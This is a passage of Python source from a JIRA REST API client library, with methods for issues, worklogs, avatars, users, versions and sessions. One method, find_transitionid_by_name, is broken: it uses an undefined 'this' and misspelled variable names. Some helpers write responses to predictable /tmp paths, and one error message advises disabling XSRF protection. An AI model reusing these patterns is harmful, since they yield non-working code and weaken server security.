comment = Comment(self._options, self._session, raw=json_loads(r))
return comment
# non-resource
@translate_resource_args
def editmeta(self, issue):
"""
Get the edit metadata for an issue.
:param issue: the issue to get metadata for
"""
return self._get_json('issue/' + str(issue) + '/editmeta')
@translate_resource_args
def remote_links(self, issue):
"""
Get a list of remote link Resources from an issue.
:param issue: the issue to get remote links from
"""
r_json = self._get_json('issue/' + str(issue) + '/remotelink')
remote_links = [RemoteLink(
self._options, self._session, raw_remotelink_json) for raw_remotelink_json in r_json]
return remote_links
@translate_resource_args
def remote_link(self, issue, id):
"""
Get a remote link Resource from the server.
:param issue: the issue holding the remote link
:param id: ID of the remote link
"""
return self._find_for_resource(RemoteLink, (issue, id))
# removed the @translate_resource_args because it prevents us from finding
# information for building a proper link
def add_remote_link(self, issue, destination, globalId=None, application=None, relationship=None):
"""
Add a remote link from an issue to an external application and returns a remote link Resource
for it. ``object`` should be a dict containing at least ``url`` to the linked external URL and
``title`` to display for the link inside JIRA.
For definitions of the allowable fields for ``object`` and the keyword arguments ``globalId``, ``application``
and ``relationship``, see https://developer.atlassian.com/display/JIRADEV/JIRA+REST+API+for+Remote+Issue+Links.
:param issue: the issue to add the remote link to
:param destination: the link details to add (see the above link for details)
:param globalId: unique ID for the link (see the above link for details)
:param application: application information for the link (see the above link for details)
:param relationship: relationship description for the link (see the above link for details)
"""
warnings.warn(
"broken: see https://bitbucket.org/bspeakmon/jira-python/issue/46 and https://jira.atlassian.com/browse/JRA-38551",
Warning)
data = {}
if type(destination) == Issue:
data['object'] = {
'title': str(destination),
'url': destination.permalink()
}
for x in self.applicationlinks():
if x['application']['displayUrl'] == destination._options['server']:
data['globalId'] = "appId=%s&issueId=%s" % (
x['application']['id'], destination.raw['id'])
data['application'] = {
'name': x['application']['name'], 'type': "com.atlassian.jira"}
break
if 'globalId' not in data:
raise NotImplementedError(
"Unable to identify the issue to link to.")
else:
if globalId is not None:
data['globalId'] = globalId
if application is not None:
data['application'] = application
data['object'] = destination
if relationship is not None:
data['relationship'] = relationship
# check if the link comes from one of the configured application links
for x in self.applicationlinks():
if x['application']['displayUrl'] == self._options['server']:
data['globalId'] = "appId=%s&issueId=%s" % (
x['application']['id'], destination.raw['id'])
data['application'] = {
'name': x['application']['name'], 'type': "com.atlassian.jira"}
break
url = self._get_url('issue/' + str(issue) + '/remotelink')
r = self._session.post(
url, data=json.dumps(data))
remote_link = RemoteLink(
self._options, self._session, raw=json_loads(r))
return remote_link
# non-resource
@translate_resource_args
def transitions(self, issue, id=None, expand=None):
"""
Get a list of the transitions available on the specified issue to the current user.
:param issue: ID or key of the issue to get the transitions from
:param id: if present, get only the transition matching this ID
:param expand: extra information to fetch inside each transition
"""
params = {}
if id is not None:
params['transitionId'] = id
if expand is not None:
params['expand'] = expand
return self._get_json('issue/' + str(issue) + '/transitions', params=params)['transitions']
def find_transitionid_by_name(self, issue, transition_name):
"""
Get a transitionid available on the specified issue to the current user.
Look at https://developer.atlassian.com/static/rest/jira/6.1.html#d2e1074 for json reference
:param issue: ID or key of the issue to get the transitions from
:param trans_name: iname of transition we are looking for
"""
transitions_json = this.transitions(issue)
id = None
for transition in transtitions_json["transtions"]:
if transition["name"].lower() == transition_name.lower():
id = transition["id"]
break
return id
@translate_resource_args
def transition_issue(self, issue, transition, fields=None, comment=None, **fieldargs):
# TODO: Support update verbs (same as issue.update())
"""
Perform a transition on an issue.
Each keyword argument (other than the predefined ones) is treated as a field name and the argument's value
is treated as the intended value for that field -- if the fields argument is used, all other keyword arguments
will be ignored. Field values will be set on the issue as part of the transition process.
:param issue: ID or key of the issue to perform the transition on
:param transition: ID or name of the transition to perform
:param comment: *Optional* String to add as comment to the issue when performing the transition.
:param fields: a dict containing field names and the values to use. If present, all other keyword arguments\
will be ignored
"""
transitionId = None
try:
transitionId = int(transition)
except:
# cannot cast to int, so try to find transitionId by name
transitionId = self.find_transitionid_by_name(issue, transition)
if transitionId is None:
raise JIRAError("Invalid transition name. %s" % transition)
data = {
'transition': {
'id': transitionId
}
}
if comment:
data['update'] = {'comment': [{'add': {'body': comment}}]}
if fields is not None:
data['fields'] = fields
else:
fields_dict = {}
for field in fieldargs:
fields_dict[field] = fieldargs[field]
data['fields'] = fields_dict
url = self._get_url('issue/' + str(issue) + '/transitions')
r = self._session.post(
url, data=json.dumps(data))
@translate_resource_args
def votes(self, issue):
"""
Get a votes Resource from the server.
:param issue: ID or key of the issue to get the votes for
"""
return self._find_for_resource(Votes, issue)
@translate_resource_args
def add_vote(self, issue):
"""
Register a vote for the current authenticated user on an issue.
:param issue: ID or key of the issue to vote on
"""
url = self._get_url('issue/' + str(issue) + '/votes')
r = self._session.post(url)
@translate_resource_args
def remove_vote(self, issue):
"""
Remove the current authenticated user's vote from an issue.
:param issue: ID or key of the issue to unvote on
"""
url = self._get_url('issue/' + str(issue) + '/votes')
self._session.delete(url)
@translate_resource_args
def watchers(self, issue):
"""
Get a watchers Resource from the server for an issue.
:param issue: ID or key of the issue to get the watchers for
"""
return self._find_for_resource(Watchers, issue)
@translate_resource_args
def add_watcher(self, issue, watcher):
"""
Add a user to an issue's watchers list.
:param issue: ID or key of the issue affected
:param watcher: username of the user to add to the watchers list
"""
url = self._get_url('issue/' + str(issue) + '/watchers')
self._session.post(
url, data=json.dumps(watcher))
@translate_resource_args
def remove_watcher(self, issue, watcher):
"""
Remove a user from an issue's watch list.
:param issue: ID or key of the issue affected
:param watcher: username of the user to remove from the watchers list
"""
url = self._get_url('issue/' + str(issue) + '/watchers')
params = {'username': watcher}
result = self._session.delete(url, params=params)
return result
@translate_resource_args
def worklogs(self, issue):
"""
Get a list of worklog Resources from the server for an issue.
:param issue: ID or key of the issue to get worklogs from
"""
r_json = self._get_json('issue/' + str(issue) + '/worklog')
worklogs = [Worklog(self._options, self._session, raw_worklog_json)
for raw_worklog_json in r_json['worklogs']]
return worklogs
@translate_resource_args
def worklog(self, issue, id):
"""
Get a specific worklog Resource from the server.
:param issue: ID or key of the issue to get the worklog from
:param id: ID of the worklog to get
"""
return self._find_for_resource(Worklog, (issue, id))
@translate_resource_args
def add_worklog(self, issue, timeSpent=None, timeSpentSeconds=None, adjustEstimate=None,
newEstimate=None, reduceBy=None, comment=None, started=None, user=None):
"""
Add a new worklog entry on an issue and return a Resource for it.
:param issue: the issue to add the worklog to
:param timeSpent: a worklog entry with this amount of time spent, e.g. "2d"
:param adjustEstimate: (optional) allows the user to provide specific instructions to update the remaining\
time estimate of the issue. The value can either be ``new``, ``leave``, ``manual`` or ``auto`` (default).
:param newEstimate: the new value for the remaining estimate field. e.g. "2d"
:param reduceBy: the amount to reduce the remaining estimate by e.g. "2d"
:param started: Moment when the work is logged, if not specified will default to now
:param comment: optional worklog comment
"""
params = {}
if adjustEstimate is not None:
params['adjustEstimate'] = adjustEstimate
if newEstimate is not None:
params['newEstimate'] = newEstimate
if reduceBy is not None:
params['reduceBy'] = reduceBy
data = {}
if timeSpent is not None:
data['timeSpent'] = timeSpent
if timeSpentSeconds is not None:
data['timeSpentSeconds'] = timeSpentSeconds
if comment is not None:
data['comment'] = comment
elif user:
# we log user inside comment as it doesn't always work
data['comment'] = user
if started is not None:
# based on REST Browser it needs: "2014-06-03T08:21:01.273+0000"
data['started'] = started.strftime("%Y-%m-%dT%H:%M:%S.000%z")
if user is not None:
data['author'] = {"name": user,
'self': self.JIRA_BASE_URL + '/rest/api/2/user?username=' + user,
'displayName': user,
'active': False
}
data['updateAuthor'] = data['author']
# TODO: report bug to Atlassian: author and updateAuthor parameters are
# ignored.
url = self._get_url('issue/{0}/worklog'.format(issue))
r = self._session.post(url, params=params, data=json.dumps(data))
return Worklog(self._options, self._session, json_loads(r))
# Issue links
@translate_resource_args
def create_issue_link(self, type, inwardIssue, outwardIssue, comment=None):
"""
Create a link between two issues.
:param type: the type of link to create
:param inwardIssue: the issue to link from
:param outwardIssue: the issue to link to
:param comment: a comment to add to the issues with the link. Should be a dict containing ``body``\
and ``visibility`` fields: ``body`` being the text of the comment and ``visibility`` being a dict containing\
two entries: ``type`` and ``value``. ``type`` is ``role`` (or ``group`` if the JIRA server has configured\
comment visibility for groups) and ``value`` is the name of the role (or group) to which viewing of this\
comment will be restricted.
"""
# let's see if we have the right issue link 'type' and fix it if needed
if not hasattr(self, '_cached_issuetypes'):
self._cached_issue_link_types = self.issue_link_types()
if type not in self._cached_issue_link_types:
for lt in self._cached_issue_link_types:
if lt.outward == type:
# we are smart to figure it out what he ment
type = lt.name
break
elif lt.inward == type:
# so that's the reverse, so we fix the request
type = lt.name
inwardIssue, outwardIssue = outwardIssue, inwardIssue
break
data = {
'type': {
'name': type
},
'inwardIssue': {
'key': inwardIssue
},
'outwardIssue': {
'key': outwardIssue
},
'comment': comment
}
url = self._get_url('issueLink')
r = self._session.post(
url, data=json.dumps(data))
def issue_link(self, id):
"""
Get an issue link Resource from the server.
:param id: ID of the issue link to get
"""
return self._find_for_resource(IssueLink, id)
# Issue link types
def issue_link_types(self):
"""Get a list of issue link type Resources from the server."""
r_json = self._get_json('issueLinkType')
link_types = [IssueLinkType(self._options, self._session, raw_link_json) for raw_link_json in
r_json['issueLinkTypes']]
return link_types
def issue_link_type(self, id):
"""
Get an issue link type Resource from the server.
:param id: ID of the issue link type to get
"""
return self._find_for_resource(IssueLinkType, id)
# Issue types
def issue_types(self):
"""Get a list of issue type Resources from the server."""
r_json = self._get_json('issuetype')
issue_types = [IssueType(
self._options, self._session, raw_type_json) for raw_type_json in r_json]
return issue_types
def issue_type(self, id):
"""
Get an issue type Resource from the server.
:param id: ID of the issue type to get
"""
return self._find_for_resource(IssueType, id)
# User permissions
# non-resource
def my_permissions(self, projectKey=None, projectId=None, issueKey=None, issueId=None):
"""
Get a dict of all available permissions on the server.
:param projectKey: limit returned permissions to the specified project
:param projectId: limit returned permissions to the specified project
:param issueKey: limit returned permissions to the specified issue
:param issueId: limit returned permissions to the specified issue
"""
params = {}
if projectKey is not None:
params['projectKey'] = projectKey
if projectId is not None:
params['projectId'] = projectId
if issueKey is not None:
params['issueKey'] = issueKey
if issueId is not None:
params['issueId'] = issueId
return self._get_json('mypermissions', params=params)
# Priorities
def priorities(self):
"""Get a list of priority Resources from the server."""
r_json = self._get_json('priority')
priorities = [Priority(
self._options, self._session, raw_priority_json) for raw_priority_json in r_json]
return priorities
def priority(self, id):
"""
Get a priority Resource from the server.
:param id: ID of the priority to get
"""
return self._find_for_resource(Priority, id)
# Projects
def projects(self):
"""Get a list of project Resources from the server visible to the current authenticated user."""
r_json = self._get_json('project')
projects = [Project(
self._options, self._session, raw_project_json) for raw_project_json in r_json]
return projects
def project(self, id):
"""
Get a project Resource from the server.
:param id: ID or key of the project to get
"""
return self._find_for_resource(Project, id)
# non-resource
@translate_resource_args
def project_avatars(self, project):
"""
Get a dict of all avatars for a project visible to the current authenticated user.
:param project: ID or key of the project to get avatars for
"""
return self._get_json('project/' + project + '/avatars')
@translate_resource_args
def create_temp_project_avatar(self, project, filename, size, avatar_img, contentType=None, auto_confirm=False):
"""
Register an image file as a project avatar. The avatar created is temporary and must be confirmed before it can
be used.
Avatar images are specified by a filename, size, and file object. By default, the client will attempt to
autodetect the picture's content type: this mechanism relies on libmagic and will not work out of the box
on Windows systems (see http://filemagic.readthedocs.org/en/latest/guide.html for details on how to install
support). The ``contentType`` argument can be used to explicitly set the value (note that JIRA will reject any
type other than the well-known ones for images, e.g. ``image/jpg``, ``image/png``, etc.)
This method returns a dict of properties that can be used to crop a subarea of a larger image for use. This
dict should be saved and passed to :py:meth:`confirm_project_avatar` to finish the avatar creation process. If\
you want to cut out the middleman and confirm the avatar with JIRA's default cropping, pass the 'auto_confirm'\
argument with a truthy value and :py:meth:`confirm_project_avatar` will be called for you before this method\
returns.
:param project: ID or key of the project to create the avatar in
:param filename: name of the avatar file
:param size: size of the avatar file
:param avatar_img: file-like object holding the avatar
:param contentType: explicit specification for the avatar image's content-type
:param boolean auto_confirm: whether to automatically confirm the temporary avatar by calling\
:py:meth:`confirm_project_avatar` with the return value of this method.
"""
size_from_file = os.path.getsize(filename)
if size != size_from_file:
size = size_from_file
params = {
'filename': filename,
'size': size
}
headers = {'X-Atlassian-Token': 'no-check'}
if contentType is not None:
headers['content-type'] = contentType
else:
# try to detect content-type, this may return None
headers['content-type'] = self._get_mime_type(avatar_img)
url = self._get_url('project/' + project + '/avatar/temporary')
r = self._session.post(
url, params=params, headers=headers, data=avatar_img)
cropping_properties = json_loads(r)
if auto_confirm:
return self.confirm_project_avatar(project, cropping_properties)
else:
return cropping_properties
@translate_resource_args
def confirm_project_avatar(self, project, cropping_properties):
"""
Confirm the temporary avatar image previously uploaded with the specified cropping.
After a successful registry with :py:meth:`create_temp_project_avatar`, use this method to confirm the avatar
for use. The final avatar can be a subarea of the uploaded image, which is customized with the
``cropping_properties``: the return value of :py:meth:`create_temp_project_avatar` should be used for this
argument.
:param project: ID or key of the project to confirm the avatar in
:param cropping_properties: a dict of cropping properties from :py:meth:`create_temp_project_avatar`
"""
data = cropping_properties
url = self._get_url('project/' + project + '/avatar')
r = self._session.post(
url, data=json.dumps(data))
return json_loads(r)
@translate_resource_args
def set_project_avatar(self, project, avatar):
"""
Set a project's avatar.
:param project: ID or key of the project to set the avatar on
:param avatar: ID of the avatar to set
"""
self._set_avatar(
None, self._get_url('project/' + project + '/avatar'), avatar)
@translate_resource_args
def delete_project_avatar(self, project, avatar):
"""
Delete a project's avatar.
:param project: ID or key of the project to delete the avatar from
:param avatar: ID of the avater to delete
"""
url = self._get_url('project/' + project + '/avatar/' + avatar)
r = self._session.delete(url)
@translate_resource_args
def project_components(self, project):
"""
Get a list of component Resources present on a project.
:param project: ID or key of the project to get components from
"""
r_json = self._get_json('project/' + project + '/components')
components = [Component(
self._options, self._session, raw_comp_json) for raw_comp_json in r_json]
return components
@translate_resource_args
def project_versions(self, project):
"""
Get a list of version Resources present on a project.
:param project: ID or key of the project to get versions from
"""
r_json = self._get_json('project/' + project + '/versions')
versions = [
Version(self._options, self._session, raw_ver_json) for raw_ver_json in r_json]
return versions
# non-resource
@translate_resource_args
def project_roles(self, project):
"""
Get a dict of role names to resource locations for a project.
:param project: ID or key of the project to get roles from
"""
return self._get_json('project/' + project + '/role')
@translate_resource_args
def project_role(self, project, id):
"""
Get a role Resource.
:param project: ID or key of the project to get the role from
:param id: ID of the role to get
"""
return self._find_for_resource(Role, (project, id))
# Resolutions
def resolutions(self):
"""Get a list of resolution Resources from the server."""
r_json = self._get_json('resolution')
resolutions = [Resolution(
self._options, self._session, raw_res_json) for raw_res_json in r_json]
return resolutions
def resolution(self, id):
"""
Get a resolution Resource from the server.
:param id: ID of the resolution to get
"""
return self._find_for_resource(Resolution, id)
# Search
def search_issues(self, jql_str, startAt=0, maxResults=50, validate_query=True, fields=None, expand=None,
json_result=None):
"""
Get a ResultList of issue Resources matching a JQL search string.
:param jql_str: the JQL search string to use
:param startAt: index of the first issue to return
:param maxResults: maximum number of issues to return. Total number of results
is available in the ``total`` attribute of the returned ResultList.
If maxResults evaluates as False, it will try to get all issues in batches of 50.
:param fields: comma-separated string of issue fields to include in the results
:param expand: extra information to fetch inside each resource
"""
# TODO what to do about the expand, which isn't related to the issues?
infinite = False
maxi = 50
idx = 0
if fields is None:
fields = []
# If None is passed as parameter, this fetch all issues from the query
if not maxResults:
maxResults = maxi
infinite = True
search_params = {
"jql": jql_str,
"startAt": startAt,
"maxResults": maxResults,
"validateQuery": validate_query,
"fields": fields,
"expand": expand
}
if json_result:
return self._get_json('search', params=search_params)
resource = self._get_json('search', params=search_params)
issues = [Issue(self._options, self._session, raw_issue_json)
for raw_issue_json in resource['issues']]
cnt = len(issues)
total = resource['total']
if infinite:
while cnt == maxi:
idx += maxi
search_params["startAt"] = idx
resource = self._get_json('search', params=search_params)
issue_batch = [Issue(self._options, self._session, raw_issue_json) for raw_issue_json in
resource['issues']]
issues.extend(issue_batch)
cnt = len(issue_batch)
return ResultList(issues, total)
# Security levels
def security_level(self, id):
"""
Get a security level Resource.
:param id: ID of the security level to get
"""
return self._find_for_resource(SecurityLevel, id)
# Server info
# non-resource
def server_info(self):
"""Get a dict of server information for this JIRA instance."""
return self._get_json('serverInfo')
# Status
def statuses(self):
"""Get a list of status Resources from the server."""
r_json = self._get_json('status')
statuses = [Status(self._options, self._session, raw_stat_json)
for raw_stat_json in r_json]
return statuses
def status(self, id):
"""
Get a status Resource from the server.
:param id: ID of the status resource to get
"""
return self._find_for_resource(Status, id)
# Users
def user(self, id, expand=None):
"""
Get a user Resource from the server.
:param id: ID of the user to get
:param expand: extra information to fetch inside each resource
"""
user = User(self._options, self._session)
params = {}
if expand is not None:
params['expand'] = expand
user.find(id, params=params)
return user
def search_assignable_users_for_projects(self, username, projectKeys, startAt=0, maxResults=50):
"""
Get a list of user Resources that match the search string and can be assigned issues for projects.
:param username: a string to match usernames against
:param projectKeys: comma-separated list of project keys to check for issue assignment permissions
:param startAt: index of the first user to return
:param maxResults: maximum number of users to return
"""
params = {
'username': username,
'projectKeys': projectKeys,
'startAt': startAt,
'maxResults': maxResults
}
r_json = self._get_json(
'user/assignable/multiProjectSearch', params=params)
users = [User(self._options, self._session, raw_user_json)
for raw_user_json in r_json]
return users
def search_assignable_users_for_issues(self, username, project=None, issueKey=None, expand=None, startAt=0,
maxResults=50):
"""
Get a list of user Resources that match the search string for assigning or creating issues.
This method is intended to find users that are eligible to create issues in a project or be assigned
to an existing issue. When searching for eligible creators, specify a project. When searching for eligible
assignees, specify an issue key.
:param username: a string to match usernames against
:param project: filter returned users by permission in this project (expected if a result will be used to \
create an issue)
:param issueKey: filter returned users by this issue (expected if a result will be used to edit this issue)
:param expand: extra information to fetch inside each resource
:param startAt: index of the first user to return
:param maxResults: maximum number of users to return
"""
params = {
'username': username,
'startAt': startAt,
'maxResults': maxResults,
}
if project is not None:
params['project'] = project
if issueKey is not None:
params['issueKey'] = issueKey
if expand is not None:
params['expand'] = expand
r_json = self._get_json('user/assignable/search', params)
users = [User(self._options, self._session, raw_user_json)
for raw_user_json in r_json]
return users
# non-resource
def user_avatars(self, username):
"""
Get a dict of avatars for the specified user.
:param username: the username to get avatars for
"""
return self._get_json('user/avatars', params={'username': username})
def create_temp_user_avatar(self, user, filename, size, avatar_img, contentType=None, auto_confirm=False):
"""
Register an image file as a user avatar. The avatar created is temporary and must be confirmed before it can
be used.
Avatar images are specified by a filename, size, and file object. By default, the client will attempt to
autodetect the picture's content type: this mechanism relies on ``libmagic`` and will not work out of the box
on Windows systems (see http://filemagic.readthedocs.org/en/latest/guide.html for details on how to install
support). The ``contentType`` argument can be used to explicitly set the value (note that JIRA will reject any
type other than the well-known ones for images, e.g. ``image/jpg``, ``image/png``, etc.)
This method returns a dict of properties that can be used to crop a subarea of a larger image for use. This
dict should be saved and passed to :py:meth:`confirm_user_avatar` to finish the avatar creation process. If you
want to cut out the middleman and confirm the avatar with JIRA's default cropping, pass the ``auto_confirm``
argument with a truthy value and :py:meth:`confirm_user_avatar` will be called for you before this method
returns.
:param user: user to register the avatar for
:param filename: name of the avatar file
:param size: size of the avatar file
:param avatar_img: file-like object containing the avatar
:param contentType: explicit specification for the avatar image's content-type
:param auto_confirm: whether to automatically confirm the temporary avatar by calling\
:py:meth:`confirm_user_avatar` with the return value of this method.
"""
size_from_file = os.path.getsize(filename)
if size != size_from_file:
size = size_from_file
params = {
'username': user,
'filename': filename,
'size': size
}
headers = {'X-Atlassian-Token': 'no-check'}
if contentType is not None:
headers['content-type'] = contentType
else:
# try to detect content-type, this may return None
headers['content-type'] = self._get_mime_type(avatar_img)
url = self._get_url('user/avatar/temporary')
r = self._session.post(
url, params=params, headers=headers, data=avatar_img)
cropping_properties = json_loads(r)
if auto_confirm:
return self.confirm_user_avatar(user, cropping_properties)
else:
return cropping_properties
def confirm_user_avatar(self, user, cropping_properties):
"""
Confirm the temporary avatar image previously uploaded with the specified cropping.
After a successful registry with :py:meth:`create_temp_user_avatar`, use this method to confirm the avatar for
use. The final avatar can be a subarea of the uploaded image, which is customized with the
``cropping_properties``: the return value of :py:meth:`create_temp_user_avatar` should be used for this
argument.
:param user: the user to confirm the avatar for
:param cropping_properties: a dict of cropping properties from :py:meth:`create_temp_user_avatar`
"""
data = cropping_properties
url = self._get_url('user/avatar')
r = self._session.post(url, params={'username': user},
data=json.dumps(data))
return json_loads(r)
def set_user_avatar(self, username, avatar):
"""
Set a user's avatar.
:param username: the user to set the avatar for
:param avatar: ID of the avatar to set
"""
self._set_avatar(
{'username': username}, self._get_url('user/avatar'), avatar)
def delete_user_avatar(self, username, avatar):
"""
Delete a user's avatar.
:param username: the user to delete the avatar from
:param avatar: ID of the avatar to remove
"""
params = {'username': username}
url = self._get_url('user/avatar/' + avatar)
r = self._session.delete(url, params=params)
def search_users(self, user, startAt=0, maxResults=50, includeActive=True, includeInactive=False):
"""
Get a list of user Resources that match the specified search string.
:param user: a string to match usernames, name or email against
:param startAt: index of the first user to return
:param maxResults: maximum number of users to return
"""
params = {
'username': user,
'startAt': startAt,
'maxResults': maxResults,
'includeActive': includeActive,
'includeInactive': includeInactive
}
r_json = self._get_json('user/search', params=params)
users = [User(self._options, self._session, raw_user_json)
for raw_user_json in r_json]
return users
def search_allowed_users_for_issue(self, user, issueKey=None, projectKey=None, startAt=0, maxResults=50):
"""
Get a list of user Resources that match a username string and have browse permission for the issue or
project.
:param user: a string to match usernames against
:param issueKey: find users with browse permission for this issue
:param projectKey: find users with browse permission for this project
:param startAt: index of the first user to return
:param maxResults: maximum number of users to return
"""
params = {
'username': user,
'startAt': startAt,
'maxResults': maxResults,
}
if issueKey is not None:
params['issueKey'] = issueKey
if projectKey is not None:
params['projectKey'] = projectKey
r_json = self._get_json('user/viewissue/search', params)
users = [User(self._options, self._session, raw_user_json)
for raw_user_json in r_json]
return users
# Versions
@translate_resource_args
def create_version(self, name, project, description=None, releaseDate=None, startDate=None, archived=False,
released=False):
"""
Create a version in a project and return a Resource for it.
:param name: name of the version to create
:param project: key of the project to create the version in
:param description: a description of the version
:param releaseDate: the release date assigned to the version
:param startDate: The start date for the version
"""
data = {
'name': name,
'project': project,
'archived': archived,
'released': released
}
if description is not None:
data['description'] = description
if releaseDate is not None:
data['releaseDate'] = releaseDate
if startDate is not None:
data['startDate'] = startDate
url = self._get_url('version')
r = self._session.post(
url, data=json.dumps(data))
version = Version(self._options, self._session, raw=json_loads(r))
return version
def move_version(self, id, after=None, position=None):
"""
Move a version within a project's ordered version list and return a new version Resource for it. One,
but not both, of ``after`` and ``position`` must be specified.
:param id: ID of the version to move
:param after: the self attribute of a version to place the specified version after (that is, higher in the list)
:param position: the absolute position to move this version to: must be one of ``First``, ``Last``,\
``Earlier``, or ``Later``
"""
data = {}
if after is not None:
data['after'] = after
elif position is not None:
data['position'] = position
url = self._get_url('version/' + id + '/move')
r = self._session.post(
url, data=json.dumps(data))
version = Version(self._options, self._session, raw=json_loads(r))
return version
def version(self, id, expand=None):
"""
Get a version Resource.
:param id: ID of the version to get
:param expand: extra information to fetch inside each resource
"""
version = Version(self._options, self._session)
params = {}
if expand is not None:
params['expand'] = expand
version.find(id, params=params)
return version
def version_count_related_issues(self, id):
"""
Get a dict of the counts of issues fixed and affected by a version.
:param id: the version to count issues for
"""
r_json = self._get_json('version/' + id + '/relatedIssueCounts')
del r_json['self'] # this isn't really an addressable resource
return r_json
def version_count_unresolved_issues(self, id):
"""
Get the number of unresolved issues for a version.
:param id: ID of the version to count issues for
"""
return self._get_json('version/' + id + '/unresolvedIssueCount')['issuesUnresolvedCount']
# Session authentication
def session(self):
"""Get a dict of the current authenticated user's session information."""
url = '{server}/rest/auth/1/session'.format(**self._options)
if type(self._session.auth) is tuple:
authentication_data = {
'username': self._session.auth[0], 'password': self._session.auth[1]}
r = self._session.post(url, data=json.dumps(authentication_data))
else:
r = self._session.get(url)
user = User(self._options, self._session, json_loads(r))
return user
def kill_session(self):
"""Destroy the session of the current authenticated user."""
url = self._options['server'] + '/rest/auth/latest/session'
r = self._session.delete(url)
# Websudo
def kill_websudo(self):
"""Destroy the user's current WebSudo session."""
url = self._options['server'] + '/rest/auth/1/websudo'
r = self._session.delete(url)
# Utilities
def _create_http_basic_session(self, username, password):
verify = self._options['verify']
self._session = ResilientSession()
self._session.verify = verify
self._session.auth = (username, password)
self._session.cert = self._options['client_cert']
def _create_oauth_session(self, oauth):
verify = self._options['verify']
from requests_oauthlib import OAuth1
from oauthlib.oauth1 import SIGNATURE_RSA
oauth = OAuth1(
oauth['consumer_key'],
rsa_key=oauth['key_cert'],
signature_method=SIGNATURE_RSA,
resource_owner_key=oauth['access_token'],
resource_owner_secret=oauth['access_token_secret']
)
self._session = ResilientSession()
self._session.verify = verify
self._session.auth = oauth
def _set_avatar(self, params, url, avatar):
data = {
'id': avatar
}
r = self._session.put(url, params=params, data=json.dumps(data))
def _get_url(self, path, base=JIRA_BASE_URL):
options = self._options
options.update({'path': path})
return base.format(**options)
def _get_json(self, path, params=None, base=JIRA_BASE_URL):
url = self._get_url(path, base)
r = self._session.get(url, params=params)
try:
r_json = json_loads(r)
except ValueError as e:
logging.error("%s\n%s" % (e, r.text))
raise e
return r_json
def _find_for_resource(self, resource_cls, ids, expand=None):
resource = resource_cls(self._options, self._session)
params = {}
if expand is not None:
params['expand'] = expand
resource.find(id=ids, params=params)
return resource
def _try_magic(self):
try:
import magic
import weakref
except ImportError:
self._magic = None
else:
try:
_magic = magic.Magic(flags=magic.MAGIC_MIME_TYPE)
cleanup = lambda _: _magic.close()
self._magic_weakref = weakref.ref(self, cleanup)
self._magic = _magic
except TypeError:
self._magic = None
except AttributeError:
self._magic = None
def _get_mime_type(self, buff):
if self._magic is not None:
return self._magic.id_buffer(buff)
else:
try:
return mimetypes.guess_type("f." + imghdr.what(0, buff))[0]
except (IOError, TypeError):
logging.warning("Couldn't detect content type of avatar image"
". Specify the 'contentType' parameter explicitly.")
return None
def email_user(self, user, body, title="JIRA Notification"):
"""
TBD:
"""
url = self._options['server'] + \
'/secure/admin/groovy/CannedScriptRunner.jspa'
payload = {
'cannedScript': 'com.onresolve.jira.groovy.canned.workflow.postfunctions.SendCustomEmail',
'cannedScriptArgs_FIELD_CONDITION': '',
'cannedScriptArgs_FIELD_EMAIL_TEMPLATE': body,
'cannedScriptArgs_FIELD_EMAIL_SUBJECT_TEMPLATE': title,
'cannedScriptArgs_FIELD_EMAIL_FORMAT': 'TEXT',
'cannedScriptArgs_FIELD_TO_ADDRESSES': self.user(user).emailAddress,
'cannedScriptArgs_FIELD_TO_USER_FIELDS': '',
'cannedScriptArgs_FIELD_INCLUDE_ATTACHMENTS': 'FIELD_INCLUDE_ATTACHMENTS_NONE',
'cannedScriptArgs_FIELD_FROM': '',
'cannedScriptArgs_FIELD_PREVIEW_ISSUE': '',
'cannedScript': 'com.onresolve.jira.groovy.canned.workflow.postfunctions.SendCustomEmail',
'id': '',
'Preview': 'Preview',
}
r = self._session.post(
url, headers=self._options['headers'], data=payload)
open("/tmp/jira_email_user_%s.html" % user, "w").write(r.text)
def rename_user(self, old_user, new_user):
"""
Rename a JIRA user. Current implementation relies on third party plugin but in the future it may use embedded JIRA functionality.
:param old_user: string with username login
:param new_user: string with username login
"""
if self._version >= (6, 0, 0):
url = self._options['server'] + '/rest/api/2/user'
payload = {
"name": new_user,
}
params = {
'username': old_user
}
# raw displayName
logging.debug("renaming %s" % self.user(old_user).emailAddress)
r = self._session.put(url, params=params,
data=json.dumps(payload))
else:
# old implementation needed the ScripRunner plugin
merge = "true"
try:
self.user(new_user)
except:
merge = "false"
url = self._options[
'server'] + '/secure/admin/groovy/CannedScriptRunner.jspa#result'
payload = {
"cannedScript": "com.onresolve.jira.groovy.canned.admin.RenameUser",
"cannedScriptArgs_FIELD_FROM_USER_ID": old_user,
"cannedScriptArgs_FIELD_TO_USER_ID": new_user,
"cannedScriptArgs_FIELD_MERGE": merge,
"id": "",
"RunCanned": "Run",
}
# raw displayName
logging.debug("renaming %s" % self.user(old_user).emailAddress)
r = self._session.post(
url, headers=self._options['headers'], data=payload)
if r.status_code == 404:
logging.error(
"In order to be able to use rename_user() you need to install Script Runner plugin. See https://marketplace.atlassian.com/plugins/com.onresolve.jira.groovy.groovyrunner")
return False
if r.status_code != 200:
logging.error(r.status_code)
if re.compile("XSRF Security Token Missing").search(r.content):
logging.fatal(
"Reconfigure JIRA and disable XSRF in order to be able call this. See https://developer.atlassian.com/display/JIRADEV/Form+Token+Handling")
return False
open("/tmp/jira_rename_user_%s_to%s.html" %
(old_user, new_user), "w").write(r.content)
msg = r.status_code
m = re.search("<span class=\"errMsg\">(.*)<\/span>", r.content)
if m:
msg = m.group(1)
logging.error(msg)
return False
# <span class="errMsg">Target user ID must exist already for a merge</span>
p = re.compile("type=\"hidden\" name=\"cannedScriptArgs_Hidden_output\" value=\"(.*?)\"\/>",
re.MULTILINE | re.DOTALL)
m = p.search(r.content)
if m:
h = html_parser.HTMLParser()
msg = h.unescape(m.group(1))
logging.info(msg)
# let's check if the user still exists
try:
self.user(old_user)
except:
logging.error("User %s does not exists." % old_user)
return msg
logging.error(msg)
logging.error(
"User %s does still exists after rename, that's clearly a problem." % old_user)
return False
def delete_user(self, username):
url = self._options['server'] + \
'/rest/api/latest/user/?username=%s' % username
r = self._session.delete(url)
if 200 <= r.status_code <= 299:
return True
else:
logging.error(r.status_code)
return False
def reindex(self, force=False, background=True):
"""
Start jira re-indexing. Returns True if reindexing is in progress or not needed, or False.
If you call reindex() without any parameters it will perform a backfround reindex only if JIRA thinks it should do it.
:param force: reindex even if JIRA doesn'tt say this is needed, False by default.
:param background: reindex inde background, slower but does not impact the users, defaults to True.
"""
